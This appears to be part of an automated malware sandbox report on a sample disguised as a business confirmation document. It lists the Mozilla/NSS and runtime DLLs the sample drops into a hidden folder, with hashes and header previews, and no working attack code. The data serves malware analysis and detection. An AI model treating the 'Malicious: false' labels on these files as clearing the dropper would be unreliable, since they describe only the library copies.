Entropy (8bit):	6.873960147000383
Encrypted:	false
SSDEEP:	384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
MD5:	FEFB98394CB9EF4368DA798DEAB00E21
SHA1:	316D86926B558C9F3F6133739C1A8477B9E60740
SHA-256:	B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
SHA-512:	57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-string-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	23488
Entropy (8bit):	6.840671293766487
Encrypted:	false
SSDEEP:	384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
MD5:	404604CD100A1E60DFDAF6ECF5BA14C0
SHA1:	58469835AB4B916927B3CABF54AEE4F380FF6748
SHA-256:	73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
SHA-512:	DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-time-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.018061005886957
Encrypted:	false
SSDEEP:	384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
MD5:	849F2C3EBF1FCBA33D16153692D5810F
SHA1:	1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
SHA-256:	69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
SHA-512:	44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-utility-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.127951145819804
Encrypted:	false
SSDEEP:	192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
MD5:	B52A0CA52C9C207874639B62B6082242
SHA1:	6FB845D6A82102FF74BD35F42A2844D8C450413B
SHA-256:	A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
SHA-512:	18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...\|.......................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\breakpadinjector.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	117712
Entropy (8bit):	6.598338256653691
Encrypted:	false
SSDEEP:	3072:9b9ffsTV5n8cSQQtys6FXCVnx+IMD6eN07e:P25V/QQs6WTMex7e
MD5:	A436472B0A7B2EB2C4F53FDF512D0CF8
SHA1:	963FE8AE9EC8819EF2A674DBF7C6A92DBB6B46A9
SHA-256:	87ED943D2F06D9CA8824789405B412E770FE84454950EC7E96105F756D858E52
SHA-512:	89918673ADDC0501746F24EC9A609AC4D416A4316B27BF225974E898891699B630BB18DB32432DA2F058DC11D9AF7BAF95D067B29FB39052EE7C6F622718271B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s..y7.{7.{7.{..x+>.{..~+I.{...+%.{.x+$.{..+'.{.~+..{..z+4.{7.zA.{..~+>.{..{+6.{...6.{..y+6.{Rich7.{........PE..L....@.\.........."!................t........0.......................................S....@.........................P...P.......(...................................`...T...............................@............0..D............................text............................... ..`.rdata...l...0...n... ..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.808908775107082
Encrypted:	false
SSDEEP:	6144:6cYBCU/bEPU6Rc5xUqc+z75nv4F0GHrIraqqDL6XPSed:67WRCB7zl4F0I4qn6R
MD5:	60ACD24430204AD2DC7F148B8CFE9BDC
SHA1:	989F377B9117D7CB21CBE92A4117F88F9C7693D9
SHA-256:	9876C53134DBBEC4DCCA67581F53638EBA3FEA3A15491AA3CF2526B71032DA97
SHA-512:	626C36E9567F57FA8EC9C36D96CBADEDE9C6F6734A7305ECFB9F798952BBACDFA33A1B6C4999BA5B78897DC2EC6F91870F7EC25B2CEACBAEE4BE942FE881DB01
Malicious:	false
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....@.\.........."!.........f...............................................p............@.........................p...P............@..x....................P......0...T...............................@...............8............................text...d........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ldap60.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	132048
Entropy (8bit):	6.627391684128337
Encrypted:	false
SSDEEP:	3072:qgXCFTvwqiiynFa6zqeqQZ06DdEH4sq9gHNaIkIQhEwe:qdvwqMFbOePIP/zkIQ2h
MD5:	5A49EBF1DA3D5971B62A4FD295A71ECF
SHA1:	40917474EF7914126D62BA7CDBF6CF54D227AA20
SHA-256:	2B128B3702F8509F35CAD0D657C9A00F0487B93D70336DF229F8588FBA6BA926
SHA-512:	A6123BA3BCF9DE6AA8CE09F2F84D6D3C79B0586F9E2FD0C8A6C3246A91098099B64EDC2F5D7E7007D24048F10AE9FC30CCF7779171F3FD03919807EE6AF76809
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...?S..?S..?S..S..?S\|.>R..?S;..S..?S\|.<R..?S\|.:R..?S\|.;R..?S..>R..?S..>S..?Sn.;R.?Sn.?R..?Sn..S..?Sn.=R..?SRich..?S........................PE..L....@.\.........."!.........f...... ........................................0............@.............................................x.................... ......p...T..............................@...............\............................text...:........................... ..`.rdata...@.......B..................@..@.data...l...........................@....rsrc...x...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ldif60.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20432
Entropy (8bit):	6.337521751154348
Encrypted:	false
SSDEEP:	384:YxfML3ALxK0AZEuzOJKRsIFYvDG8A3OPLonw4S:0fMmxFyO4RpGDG8MjS
MD5:	4FE544DFC7CDAA026DA6EDA09CAD66C4
SHA1:	85D21E5F5F72A4808F02F4EA14AA65154E52CE99
SHA-256:	3AABBE0AA86CE8A91E5C49B7DE577AF73B9889D7F03AF919F17F3F315A879B0F
SHA-512:	5C78C5482E589AF7D609318A6705824FD504136AEAAC63F373E913DA85FA03AF868669534496217B05D74364A165D7E08899437FCC0E3017F02D94858BA814BB
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..j..j..j...j..j^..k..j^..k..j^..k..j^..k..j...k..j..j..jL..k..jL..k..jL.bj..jL..k..jRich..j........................PE..L....<.\.........."!................Y........0...............................p......r.....@..........................5.......6.......P..x............2.......`..x....0..T...........................(1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......&..............@....rsrc...x....P.......,..............@..@.reloc..x....`.......0..............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\lgpllibs.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55760
Entropy (8bit):	6.738700405402967
Encrypted:	false
SSDEEP:	1536:LxsBS3Q6j+37mWT7DT/GszGrn7iBCmjFCOu:LxTBcmWT7X/Gszen7icmjFtu
MD5:	56E982D4C380C9CD24852564A8C02C3E
SHA1:	F9031327208176059CD03F53C8C5934C1050897F
SHA-256:	7F93B70257D966EA1C1A6038892B19E8360AADD8E8AE58E75EBB0697B9EA8786
SHA-512:	92ADC4C905A800F8AB5C972B166099382F930435694D5F9A45D1FDE3FEF94FAC57FD8FAFF56FFCFCFDBC61A43E6395561B882966BE0C814ECC7E672C67E6765A
Malicious:	false
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...........l...l...l.......l..~....l..9...l..~....l..~....l..~....l.......l..l....l...l...l...l...l..l....l..l....l..l....l..l..l..l....l..Rich.l..........................PE..L...z@.\.........."!.........2......................................................t.....@...........................................x...............................T...............................@............................................text.............................. ..`.rdata..>...........................@..@.data...............................@....rodata.8...........................@..@.rsrc...x...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\libEGL.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22480
Entropy (8bit):	6.528357540966124
Encrypted:	false
SSDEEP:	384:INZ9mLVDAffJJKAtn0mLAb8X3FbvDG8A3OPLonzvGb:4mx+fXvn4YFrDG8MKb
MD5:	96B879B611B2BBEE85DF18884039C2B8
SHA1:	00794796ACAC3899C1FB9ABBF123FEF3CC641624
SHA-256:	7B9FC6BE34F43D39471C2ADD872D5B4350853DB11CC66A323EF9E0C231542FB9
SHA-512:	DF8F1AA0384A5682AE47F212F3153D26EAFBBF12A8C996428C3366BEBE16850D0BDA453EC5F4806E6A62C36D312D37B8BBAFF549968909415670C9C61A6EC49A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...N{.N{.N{.6..N{.F,z.N{.F,x.N{.F,~.N{.F,..N{..z.N{.T-z.N{.Nz..N{.T-~.N{.T-{.N{.T-..N{.T-y.N{.Rich.N{.........................PE..L...aA.\.........."!.........(............... ...............................p......~.....@..........................%..........d....P..x............:.......`.......!..T............................"..@............ ...............................text... ........................... ..`.rdata....... ......................@..@.data........@.......2..............@....rsrc...x....P.......4..............@..@.reloc.......`.......8..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozMapi32.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
SSDEEP:	1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozMapi32_InUse.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83408
Entropy (8bit):	6.436278889454398
Encrypted:	false
SSDEEP:	1536:CNr03+TtFKytqB0EeCsu1sW+cdQOTki9jHiU:CNrDKHBBjXQSki9OU
MD5:	385A92719CC3A215007B83947922B9B5
SHA1:	38DE6CA70CEE1BAD84BED29CE7620A15E6ABCD10
SHA-256:	06EF2010B738FBE99BCDEBBF162473A4EE090678BB6862EEB0D4C7A8C3F225BB
SHA-512:	9F0DFF00C7E72D7017AECE3FA5C31A9C2C2AA0CCC6606D2561CE8D36A4A1F0AB8DC452E2C65E9F4B6CD32BBB8ADA1FF7C865126A5F318719579DB763E4C4183F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........mR;...;...;.......2.......G.......).......*.......".......4.......>...;...n.......:.......:.......:.......:...Rich;...........................PE..L....=.\.........."!.........................................................`......>.....@.............................l.......<....@..P............(.......P..d...0...T...............................@............................................text............................... ..`.rdata..Z[.......\..................@..@.data........ ......................@....rsrc...P....@......................@..@.reloc..d....P......................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\mozglue.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.784614237836286
Encrypted:	false
SSDEEP:	3072:Z6s2DIGLXlNJJcPoN0j/kVqhp1qt/TXTv7q1D2JJJvPhrSeXZ5dR:MszGLXlNrE/kVqhp12/TXTjSD2JJJvPt
MD5:	EAE9273F8CDCF9321C6C37C244773139
SHA1:	8378E2A2F3635574C106EEA8419B5EB00B8489B0
SHA-256:	A0C6630D4012AE0311FF40F4F06911BCF1A23F7A4762CE219B8DFFA012D188CC
SHA-512:	06E43E484A89CEA9BA9B9519828D38E7C64B040F44CDAEB321CBDA574E7551B11FEA139CE3538F387A0A39A3D8C4CBA7F4CF03E4A3C98DB85F8121C2212A9097
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...{>.\.........."!.....z...................................................@......j.....@A........................@...t.......,.... ..x....................0..l.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..l....0......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\msvcp140.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nss3.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1245136
Entropy (8bit):	6.766715162066988
Encrypted:	false
SSDEEP:	24576:ido5Js2a56/+VwJebKj5KYFsRjzx5ZxKV6D1Z4Go/LCiytoxq2Zwn5hCM4MSRdY8:Q2aY4w6aozx5ZWMM7yew8MSRK1y
MD5:	02CC7B8EE30056D5912DE54F1BDFC219
SHA1:	A6923DA95705FB81E368AE48F93D28522EF552FB
SHA-256:	1989526553FD1E1E49B0FEA8036822CA062D3D39C4CAB4A37846173D0F1753D5
SHA-512:	0D5DFCF4FB19B27246FA799E339D67CD1B494427783F379267FB2D10D615FFB734711BAB2C515062C078F990A44A36F2D15859B1DACD4143DCC35B5C0CEE0EF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c.4.'.Z.'.Z.'.Z.....3.Z...[.%.Z.B..#.Z...Y.*.Z..._.-.Z...^.,.Z...[./.Z..[.$.Z.'.[...Z..^.-.Z..Z.&.Z...&.Z..X.&.Z.Rich'.Z.........................PE..L....@.\.........."!.........................................................@......Q.....@................................x=..T.......p........................\|......T...........................h...@............................................text............................... ..`.rdata...Q.......R..................@..@.data...tG...`..."...>..............@....rsrc...p............`..............@..@.reloc...\|.......~...d..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nssckbi.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	336336
Entropy (8bit):	7.0315399874711995
Encrypted:	false
SSDEEP:	6144:8bndzEL04gF85K9autIMyEhZ/V3psPyHa9tBe1:8bndzEL04pnutIMyAp2z9tBe1
MD5:	BDAF9852F588C86B055C846B53D4C144
SHA1:	03B739430CF9EADE21C977B5B416C4DD94528C3B
SHA-256:	2481DA1C459A2429A933D19AD6AE514BD2AE59818246DDB67B0EF44146CED3D8
SHA-512:	19D9A952A3DF5703542FA52A5A780C2E04D6A132059F30715954EAC40CD1C3F3B119A29736D4A911BE85086AFE08A54A7482FA409DFD882BAC39037F9EECD7EF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pi.Pi.Pi.(..Pi.F2h.Pi.F2j.Pi.F2l.Pi.F2m.Pi.0h.Pi.T3h.Pi.Ph.Pi.T3m.Pi.T3i.Pi.T3..Pi.T3k.Pi.Rich.Pi.........PE..L....@.\.........."!.........`......q........................................@...........@.............................P.......d.......x.......................t)..p...T..............................@............................................text.............................. ..`.rdata..>...........................@..@.data....N.......L..................@....rsrc...x...........................@..@.reloc..t).......*..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\nssdbm3.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	92624
Entropy (8bit):	6.639527605275762
Encrypted:	false
SSDEEP:	1536:YvNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41Pc:+NGVOiBZbcGmxXMcBqmzoCUZoZebHPAT
MD5:	94919DEA9C745FBB01653F3FDAE59C23
SHA1:	99181610D8C9255947D7B2134CDB4825BD5A25FF
SHA-256:	BE3987A6CD970FF570A916774EB3D4E1EDCE675E70EDAC1BAF5E2104685610B0
SHA-512:	1A3BB3ECADD76678A65B7CB4EBE3460D0502B4CA96B1399F9E56854141C8463A0CFCFFEDF1DEFFB7470DDFBAC3B608DC10514ECA196D19B70803FBB02188E15E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L....@.\.........."!.........0...............0......................................*q....@......................... ?......(@.......`..x............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..D....0... ..................@..@.data........P.......>..............@....rsrc...x....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\pY4zE3fX7h.zip Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	2828315
Entropy (8bit):	7.998625956067725
Encrypted:	true
SSDEEP:	49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
MD5:	1117CD347D09C43C1F2079439056ADA3
SHA1:	93C2CE5FC4924314318554E131CFBCD119F01AB6
SHA-256:	4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
SHA-512:	FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
Malicious:	false
Preview:	PK.........znN<..{r....i......nssdbm3.dll...\|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.\|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K............gr..L..H...v....6[...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3....S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.\|k.5...XF.Y..lVVW..C..\|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..\|!......O....M....>.>.$\.%..L.zF.l...3

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\prldap60.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	24016
Entropy (8bit):	6.532540890393685
Encrypted:	false
SSDEEP:	384:TQJMOeAdiNcNUO3qgpw6MnTmJk0llEEHAnDl3vDG8A3OPLondJJs2z:KMaNqb6MTmVllEK2p/DG8MlsQ
MD5:	6099C438F37E949C4C541E61E88098B7
SHA1:	0AD03A6F626385554A885BD742DFE5B59BC944F5
SHA-256:	46B005817868F91CF60BAA052EE96436FC6194CE9A61E93260DF5037CDFA37A5
SHA-512:	97916C72BF75C11754523E2BC14318A1EA310189807AC8059C5F3DC1049321E5A3F82CDDD62944EA6688F046EE02FF10B7DDF8876556D1690729E5029EA414A9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:`wq[.$q[.$q[.$x#.$s[.$.9.%s[.$.9.%p[.$.9.%{[.$.9.%z[.$S;.%s[.$.8.%t[.$q[.$=[.$.8.%t[.$.8.%p[.$.8.$p[.$.8.%p[.$Richq[.$........PE..L....@.\.........."!..... ... .......%.......0...............................p......./....@..........................5......p7..x....P..x............@.......`..$...`1..T............................1..@............0..,............................text...2........ .................. ..`.rdata.......0.......$..............@..@.data...4....@.......4..............@....rsrc...x....P.......8..............@..@.reloc..$....`.......<..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\qipcap.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	16336
Entropy (8bit):	6.437762295038996
Encrypted:	false
SSDEEP:	192:aPgr1ZCb2vGJ7b20qKvFej7x0KDWpH3vUA397Ae+PjPonZwC7Qm:aYpZPGJP209F4vDG8A3OPLonZwC7X
MD5:	F3A355D0B1AB3CC8EFFCC90C8A7B7538
SHA1:	1191F64692A89A04D060279C25E4779C05D8C375
SHA-256:	7A589024CF0EEB59F020F91BE4FE7EE0C90694C92918A467D5277574AC25A5A2
SHA-512:	6A9DB921156828BCE7063E5CDC5EC5886A13BD550BA8ED88C99FA6E7869ECFBA0D0B7953A4932EB8381243CD95E87C98B91C90D4EB2B0ACD7EE87BE114A91A9E
Malicious:	false
